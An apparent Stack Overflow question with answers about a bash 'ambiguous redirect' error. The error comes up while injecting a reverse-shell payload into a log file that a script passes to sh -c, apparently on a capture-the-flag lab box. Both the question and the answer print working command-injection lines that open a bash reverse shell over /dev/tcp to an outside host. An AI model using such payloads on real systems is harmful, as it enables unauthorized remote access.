# Netcat listener produces error: "bash: 1': ambiguous redirect"

Tags: bash, redirect

When attempting to create a reverse shell with the following code injection, I receive the error: `bash: 1': ambiguous redirect`:

```
echo “ ; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.17.216/1234 0>&1’ #” >> hackers
```

The code to be executed is directed to the hackers file which, in turn, is called by this script:

```
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```

Comment: I have reformatted your question using code blocks, and noticed you use curly quotes in the first block, e.g., `“`. If that's literally what's in your code, that is likely your problem, you have to use ASCII double and single quotes here. If not, Please edit over my changes to put the actual code you are running, with its quotes as you have them in your real code.

Comment: Maybe your code injection example is meant to have curly double quotes on the outside but ASCII single quotes on the inside?

Comment: @joanis, I have tried swapping the single and double quotes but it still produces the ambiguous redirect error. I even broke down and referenced a guide on the particular box that I am working on and the code is nearly identical. I an unsure as to why this keeps popping up. I have reset the box and reconnected by VPN to the platform.

Answer (score 0):

Try to add `\"` at the start and the end :

```
echo “\" ; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.17.216/1234 0>&1’ #\"” >> hackers
```

This worked for me :

```
echo "\" HRI ; /bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' \"" >> hackers
```